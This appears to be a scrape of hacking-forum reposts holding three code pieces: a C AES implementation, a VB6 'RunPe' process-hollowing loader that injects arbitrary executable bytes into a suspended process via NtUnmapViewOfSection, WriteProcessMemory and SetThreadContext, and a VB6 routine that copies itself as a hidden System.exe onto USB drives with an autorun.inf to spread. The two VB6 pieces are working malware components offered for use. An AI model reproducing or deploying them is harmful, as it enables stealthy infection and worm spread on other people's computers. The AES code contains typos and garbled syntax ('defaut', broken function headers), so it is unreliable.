long w); void aes_keyexpansion(aes_ctx_t *ctx); inline unsigned char aes_mul_manual(unsigned char a, unsigned char ; // use aes_mul instead void aes_subbytes(aes_ctx_t *ctx); void aes_shiftrows(aes_ctx_t *ctx); void aes_mixcolumns(aes_ctx_t *ctx); void aes_addroundkey(aes_ctx_t *ctx, int round); void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]); void aes_invsubbytes(aes_ctx_t *ctx); void aes_invshiftrows(aes_ctx_t *ctx); void aes_invmixcolumns(aes_ctx_t *ctx); void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]); void aes_free_ctx(aes_ctx_t *ctx); void init_aes() { int i; unsigned char gen; // build logarithm table and it's inverse gen = 1; for(i = 0; i < 0xff; i++) { g_aes_logt[gen] = i; g_aes_ilogt[i] = gen; gen = aes_mul_manual(gen, AES_GEN); } // build S-Box and it's inverse for(i = 0; i <= 0xff; i++) { char bi; unsigned char inv = aes_inv(i); g_aes_sbox[i] = 0; for(bi = 0; bi < 8; bi++) { // based on transformation 5.1 // could also be done with a loop based on the matrix g_aes_sbox[i] |= ((inv & (1<<bi)?1:0) ^ (inv & (1 << ((bi+4) & 7))?1:0) ^ (inv & (1 << ((bi+5) & 7))?1:0) ^ (inv & (1 << ((bi+6) & 7))?1:0) ^ (inv & (1 << ((bi+7) & 7))?1:0) ^ (AES_SBOX_CC & (1 << bi)?1:0) ) << bi; } g_aes_isbox[g_aes_sbox[i]] = i; } // warning: quickhack g_aes_sbox[1] = 0x7c; g_aes_isbox[0x7c] = 1; g_aes_isbox[0x63] = 0; } aes_ctx_t *aes_alloc_ctx(unsigned char *key, size_t keyLen) { aes_ctx_t *ctx; size_t rounds; size_t ks_size; switch(keyLen) { case 16: // 128-bit key rounds = 10; break; case 24: // 192-bit key rounds = 12; break; case 32: // 256-bit key rounds = 14; break; defaut: return NULL; } ks_size = 4*(rounds+1)*sizeof(unsigned long); ctx = malloc(sizeof(aes_ctx_t)+ks_size); if(ctx) { ctx->rounds = rounds; ctx->kcol = keyLen/4; memcpy(ctx->keysched, key, keyLen); ctx->keysched[43] = 0; aes_keyexpansion(ctx); } return ctx; } inline unsigned long aes_subword(unsigned long w) { return g_aes_sbox[w & 0x000000ff] | (g_aes_sbox[(w & 0x0000ff00) >> 8] << 8) | (g_aes_sbox[(w & 0x00ff0000) >> 16] << 16) | (g_aes_sbox[(w & 0xff000000) >> 24] << 24); } inline unsigned long aes_rotword(unsigned long w) { // May seem a bit different from the spec // It was changed because unsigned long is represented with little-endian convention on x86 // Should not depend on architecture, but this is only a POC return ((w & 0x000000ff) << 24) | ((w & 0x0000ff00) >> 8) | ((w & 0x00ff0000) >> 8) | ((w & 0xff000000) >> 8); } void aes_keyexpansion(aes_ctx_t *ctx) { unsigned long temp; unsigned long rcon; register int i; rcon = 0x00000001; for(i = ctx->kcol; i < (4*(ctx->rounds+1)); i++) { temp = ctx->keysched[i-1]; if(!(i%ctx->kcol)) { temp = aes_subword(aes_rotword(temp)) ^ rcon; rcon = aes_mul(rcon, 2); } else if(ctx->kcol > 6 && i%ctx->kcol == 4) temp = aes_subword(temp); ctx->keysched[i] = ctx->keysched[i-ctx->kcol] ^ temp; } } inline unsigned char aes_mul_manual(unsigned char a, unsigned char { register unsigned short ac; register unsigned char ret; ac = a; ret = 0; while( { if(b & 0x01) ret ^= ac; ac <<= 1; b >>= 1; if(ac & 0x0100) ac ^= AES_RPOL; } return ret; } void aes_subbytes(aes_ctx_t *ctx) { int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; ctx->state[x][y] = g_aes_sbox[ctx->state[x][y]]; } } void aes_shiftrows(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; nstate[x][y] = ctx->state[x][(y+x) & 0x03]; } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_mixcolumns(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 4; i++) { nstate[0][i] = aes_mul(0x02, ctx->state[0][i]) ^ aes_mul(0x03, ctx->state[1][i]) ^ ctx->state[2][i] ^ ctx->state[3][i]; nstate[1][i] = ctx->state[0][i] ^ aes_mul(0x02, ctx->state[1][i]) ^ aes_mul(0x03, ctx->state[2][i]) ^ ctx->state[3][i]; nstate[2][i] = ctx->state[0][i] ^ ctx->state[1][i] ^ aes_mul(0x02, ctx->state[2][i]) ^ aes_mul(0x03, ctx->state[3][i]); nstate[3][i] = aes_mul(0x03, ctx->state[0][i]) ^ ctx->state[1][i] ^ ctx->state[2][i] ^ aes_mul(0x02, ctx->state[3][i]); } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_addroundkey(aes_ctx_t *ctx, int round) { int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; ctx->state[x][y] = ctx->state[x][y] ^ ((ctx->keysched[round*4+y] & (0xff << (x*8))) >> (x*8)); } } void aes_encrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]) { int i; // copy input to state for(i = 0; i < 16; i++) ctx->state[i & 0x03][i >> 2] = input[i]; aes_addroundkey(ctx, 0); for(i = 1; i < ctx->rounds; i++) { aes_subbytes(ctx); aes_shiftrows(ctx); aes_mixcolumns(ctx); aes_addroundkey(ctx, i); } aes_subbytes(ctx); aes_shiftrows(ctx); aes_addroundkey(ctx, ctx->rounds); // copy state to output for(i = 0; i < 16; i++) output[i] = ctx->state[i & 0x03][i >> 2]; } void aes_invshiftrows(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; nstate[x][(y+x) & 0x03] = ctx->state[x][y]; } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_invsubbytes(aes_ctx_t *ctx) { int i; for(i = 0; i < 16; i++) { int x, y; x = i & 0x03; y = i >> 2; ctx->state[x][y] = g_aes_isbox[ctx->state[x][y]]; } } void aes_invmixcolumns(aes_ctx_t *ctx) { unsigned char nstate[4][4]; int i; for(i = 0; i < 4; i++) { nstate[0][i] = aes_mul(0x0e, ctx->state[0][i]) ^ aes_mul(0x0b, ctx->state[1][i]) ^ aes_mul(0x0d, ctx->state[2][i]) ^ aes_mul(0x09, ctx->state[3][i]); nstate[1][i] = aes_mul(0x09, ctx->state[0][i]) ^ aes_mul(0x0e, ctx->state[1][i]) ^ aes_mul(0x0b, ctx->state[2][i]) ^ aes_mul(0x0d, ctx->state[3][i]); nstate[2][i] = aes_mul(0x0d, ctx->state[0][i]) ^ aes_mul(0x09, ctx->state[1][i]) ^ aes_mul(0x0e, ctx->state[2][i]) ^ aes_mul(0x0b, ctx->state[3][i]); nstate[3][i] = aes_mul(0x0b, ctx->state[0][i]) ^ aes_mul(0x0d, ctx->state[1][i]) ^ aes_mul(0x09, ctx->state[2][i]) ^ aes_mul(0x0e, ctx->state[3][i]); } memcpy(ctx->state, nstate, sizeof(ctx->state)); } void aes_decrypt(aes_ctx_t *ctx, unsigned char input[16], unsigned char output[16]) { int i, j; // copy input to state for(i = 0; i < 16; i++) ctx->state[i & 0x03][i >> 2] = input[i]; aes_addroundkey(ctx, ctx->rounds); for(i = ctx->rounds-1; i >= 1; i--) { aes_invshiftrows(ctx); aes_invsubbytes(ctx); aes_addroundkey(ctx, i); aes_invmixcolumns(ctx); } aes_invshiftrows(ctx); aes_invsubbytes(ctx); aes_addroundkey(ctx, 0); // copy state to output for(i = 0; i < 16; i++) output[i] = ctx->state[i & 0x03][i >> 2]; } void aes_free_ctx(aes_ctx_t *ctx) { free(ctx); } int main(int argc, char *argv[]) { unsigned char key[KEY_128] = "uber strong key!"; unsigned char ptext[16] = "Attack at dawn!"; unsigned char ctext[16]; unsigned char decptext[16]; aes_ctx_t *ctx; init_aes(); ctx = aes_alloc_ctx(key, sizeof(key)); if(!ctx) { perror("aes_alloc_ctx"); return EXIT_FAILURE; } aes_encrypt(ctx, ptext, ctext); aes_decrypt(ctx, ctext, decptext); puts(decptext); aes_free_ctx(ctx); return EXIT_SUCCESS; } In the attached zip you will also find the compiled ELF binary. Download (posibil sa trebuiasca cont): http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=2875 Sursa: [C] AES Implementation - rohitab.com - Forums

[VB6] RunPe + CallApiByName (JunPE) Product: JunPE Description: RunPe + CallApiByName Author: Jhonjhon_123 - [J.J.G.P] Option Explicit ' ****************************************************************************************************************************** ' ' ' --- Autor: Jhonjhon_123 (Jhon Jairo Pro Developer) ' --- Descripción: RunPe + CallApiByName ' --- Distribución: Libre ' --- Terminos De Uso: ' --- Prohibida su comercialización. ' --- No Debe eliminar los creditos. ' ' --- Funciones: ' --- IniciarDDLL() ' - Inicializa la configuración ' ' --- Public Sub ExecuteBytes(sName As String, bBytes() As Byte) ' - RunPE ' * sName: Ruta al exe ' * bBytes: Bytes a ejecutar ' ' ****************************************************************************************************************************** ' Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long) Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long Dim bMoveMem(36) As Byte Public Sub IniciarDDLL() Dim vTMP As Variant Dim D As Long For Each vTMP In Array(&H55, &H8B, &HEC, &H56, &H57, &H60, &HFC, &H8B, &H75, &HC, &H8B, &H7D, &H8, &H8B, &H4D, &H10, &HC1, &HE9, &H2, &HF3, &HA5, &H8B, &H4D, &H10, &H83, &HE1, &H3, &HF3, &HA4, &H61, &H5F, &H5E, &HC9, &HC2, &H10, &H0, &H20) bMoveMem(D) = CByte(vTMP): D = D + 1 Next End Sub 'By Cobein Function Call_(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long On Error Resume Next Dim lPtr As Long Dim bvASM(&HEC00& - 1) As Byte Dim i As Long Dim lMod As Long lMod = GetProcAddress(LoadLibraryA(sLib), sMod) If lMod = 0 Then Exit Function lPtr = VarPtr(bvASM(0)) RtlMoveMemory ByVal lPtr, &H59595958, &H4: lPtr = lPtr + 4 RtlMoveMemory ByVal lPtr, &H5059, &H2: lPtr = lPtr + 2 For i = UBound(Params) To 0 Step -1 RtlMoveMemory ByVal lPtr, &H68, &H1: lPtr = lPtr + 1 RtlMoveMemory ByVal lPtr, CLng(Params(i)), &H4: lPtr = lPtr + 4 Next RtlMoveMemory ByVal lPtr, &HE8, &H1: lPtr = lPtr + 1 RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4: lPtr = lPtr + 4 RtlMoveMemory ByVal lPtr, &HC3, &H1: lPtr = lPtr + 1 Call_ = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0) End Function ' By Strike Bot Public Sub MoveMemory(ByVal lpDestino As Long, ByVal lpSource As Long, ByVal cBytes As Long) Call CallWindowProcA(VarPtr(bMoveMem(0)), lpDestino, lpSource, cBytes, 0) End Sub ' By Jhonjhon_123 Public Sub ExecuteBytes(sName As String, bBytes() As Byte) On Error Resume Next Dim bIdh(63) As Byte ' IMAGE_DOS_HEADER Dim bInh(247) As Byte ' IMAGE_NT_HEADERS Dim bIsh(39) As Byte ' IMAGE_SECTION_HEADER Dim bPi(15) As Byte ' PROCESS_INFORMATION Dim bSi(67) As Byte ' STARTUPINFO Dim bCtx(203) As Byte ' CONTEXT86 Dim e_lfanew As Long Dim ImageBase As Long Dim hProcess As Long Dim hThread As Long Dim SizeOfImage As Long Dim SizeOfHeaders As Long Dim AddressOfEntryPoint As Long Dim NumberOfSections As Integer Dim VirtualAddress As Long Dim PointerToRawData As Long Dim SizeOfRawData As Long Dim Ebx As Long Dim Eax As Long Dim lTemp As Long Dim D As Long lTemp = 68 MoveMemory VarPtr(bSi(0)), VarPtr(lTemp), 4& lTemp = &H10007 MoveMemory VarPtr(bCtx(0)), VarPtr(lTemp), 4& MoveMemory VarPtr(bIdh(0)), VarPtr(bBytes(0)), 64& MoveMemory VarPtr(e_lfanew), VarPtr(bIdh(60)), 4& MoveMemory VarPtr(bInh(0)), VarPtr(bBytes(e_lfanew)), 248& MoveMemory VarPtr(ImageBase), VarPtr(bInh(52)), 4& MoveMemory VarPtr(SizeOfImage), VarPtr(bInh(80)), 4& MoveMemory VarPtr(SizeOfHeaders), VarPtr(bInh(84)), 4& MoveMemory VarPtr(AddressOfEntryPoint), VarPtr(bInh(40)), 4& MoveMemory VarPtr(NumberOfSections), VarPtr(bInh(6)), 2& Call Call_("kernel32", "CreateProcessW", 0, StrPtr(sName), 0, 0, 0, &H4, 0, 0, VarPtr(bSi(0)), VarPtr(bPi(0))) MoveMemory VarPtr(hProcess), VarPtr(bPi(0)), 4& MoveMemory VarPtr(hThread), VarPtr(bPi(4)), 4& Call Call_("ntdll", "NtUnmapViewOfSection", hProcess, ImageBase) Call Call_("kernel32", "VirtualAllocEx", hProcess, ImageBase, SizeOfImage, &H1000& Or &H2000&, &H40) Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase, VarPtr(bBytes(0)), SizeOfHeaders, 0) For D = 0 To NumberOfSections - 1 MoveMemory VarPtr(bIsh(0)), VarPtr(bBytes(e_lfanew + 248& + 40& * D)), 40& MoveMemory VarPtr(VirtualAddress), VarPtr(bIsh(12)), 4& MoveMemory VarPtr(SizeOfRawData), VarPtr(bIsh(16)), 4& MoveMemory VarPtr(PointerToRawData), VarPtr(bIsh(20)), 4& Call Call_("kernel32", "WriteProcessMemory", hProcess, ImageBase + VirtualAddress, VarPtr(bBytes(PointerToRawData)), SizeOfRawData, 0) Next Call Call_("kernel32", "GetThreadContext", hThread, VarPtr(bCtx(0))) MoveMemory VarPtr(Ebx), VarPtr(bCtx(164)), 4& Call Call_("kernel32", "WriteProcessMemory", hProcess, Ebx + 8&, VarPtr(ImageBase), 4&, 0) lTemp = ImageBase + AddressOfEntryPoint MoveMemory VarPtr(bCtx(176)), VarPtr(lTemp), 4& Call Call_("kernel32", "SetThreadContext", hThread, VarPtr(bCtx(0))) Call Call_("kernel32", "ResumeThread", hThread) End Sub Sursa: RunPe + CallApiByName (JunPE)

[VB6] Infect USB Author: mikeh18 Hello all, Here's some modified code i made for detect + infect USB drives using autorun Sub Main() On Error Resume Next 'Object and Strings Dim WMIService As Object, USBDrives As Object, USBFound As Object, USB As String, USBCount As String 'Objects Set WMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") 'Open WMIService Set USBDrives = WMIService.ExecQuery("Select * from Win32_LogicalDisk") 'Look For Computer Drives drives For Each USBFound In USBDrives 'Look for all our drives If USBFound.DriveType = 2 Then 'If drivetype is USB USB = USBFound.Name 'Set USB as New USB-name USBCount = USBCount & " - " & USBFound.Name 'Add USB name to USB-count End If If USB = "" Then GoTo volgende 'If its not an USB-Drive then goto Next FileCopy App.Path & "\" & App.EXEName & ".exe", USB & "System.exe" 'Copy File to New USB Drive Open USB & "autorun.inf" For Output As #1 'Create a Autorun file Print #1, "[autorun]" 'Put Right Settings in it Print #1, "open=System.exe" 'Put Our exe-name in It Close #1 'Close the Autorun File SetAttr USB & "System.exe", vbHidden ' vbHidden 'Hide our Exe File SetAttr USB & "autorun.inf", vbHidden 'Hide the Autorun File volgende: 'Next Next 'Search for more USB drives MsgBox "USB Drives: " & USB & vbNewLine & "Successfull Invected!", vbInformation, "USB Infect" 'Msg When Done End End Sub Mikeh18 Sursa: [VB6] Infect USB